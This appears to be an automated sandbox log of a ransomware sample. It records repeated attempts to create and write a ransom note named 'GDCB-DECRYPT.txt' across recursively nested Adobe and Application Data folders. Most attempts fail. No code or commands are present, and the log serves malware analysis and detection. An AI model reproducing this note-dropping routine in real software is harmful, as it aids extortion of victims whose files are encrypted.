File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
